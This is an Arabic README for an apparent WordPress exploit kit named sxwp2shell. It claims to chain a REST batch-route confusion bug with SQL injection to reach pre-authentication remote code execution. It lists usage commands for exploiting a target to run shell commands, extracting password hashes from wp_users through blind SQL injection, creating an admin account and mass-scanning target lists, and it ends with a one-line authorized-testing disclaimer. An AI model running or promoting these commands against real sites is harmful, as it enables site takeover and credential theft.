
عدة استغلال RCE قبل المصادقة في WordPress wp2shell (CVE-2026-63030 + CVE-2026-60137)
/ ___/___ ____ / /_(_)___ ___ / / | |/ /
\__ \/ _ \/ __ \/ __/ / __ \/ _ \/ / | /
___/ / __/ / / / /_/ / / / / __/ /___/ |
/____/\___/_/ /_/\__/_/_/ /_/\___/_____/_/|_|
sxwp2shell — استغلال RCE قبل المصادقة في ووردبريس عبر الخلط بين مسارات REST API بالدفعات (CVE-2026-63030) + حقن SQL (CVE-2026-60137).
الإصدارات المتأثرة: WP 6.9.0–6.9.4 / 7.0.0–7.0.1
git clone https://github.com/SentinelXofficial/sxwp2shell
cd sxwp2shell
chmod +x sxwp2shell.py
Python 3.7+، المكتبة القياسية فقط — لا حاجة لتثبيت pip.
| الأمر | الوظيفة |
|---|---|
check <url> | كشف الإصدار، ونقطة نهاية الدفعة، والخلط في المسارات وSQLi |
exploit <url> | سلسلة RCE كاملة (SQLi ← إنشاء مسؤول ← شل) |
read <url> | استخراج بيانات SQLi العمياء |
scan <file> | فحص جماعي للأهداف من ملف، مع تصدير CSV |
python3 sxwp2shell.py check https://target.com
python3 sxwp2shell.py exploit https://target.com --cmd id
python3 sxwp2shell.py read https://target.com --query "SELECT user_pass FROM wp_users"
python3 sxwp2shell.py scan targets.txt -o results.csv
--cmd CMD الأمر المراد تنفيذه (الافتراضي: id)
--query QUERY استعلام SQL مخصص
-k, --insecure تخطي التحقق من SSL
--proxy PROXY وكيل HTTP
--timeout SEC مهلة الطلب (الافتراضي: 15)
--delay SEC التأخير بين الطلبات
--agent AGENT وكيل مستخدم مخصص
--no-color تعطيل المخرجات الملونة
-o, --output حفظ نتائج الفحص في CSV
للاستخدام في الاختبارات الأمنية المصرح بها فقط. اقرأ DISCLAIMER.md.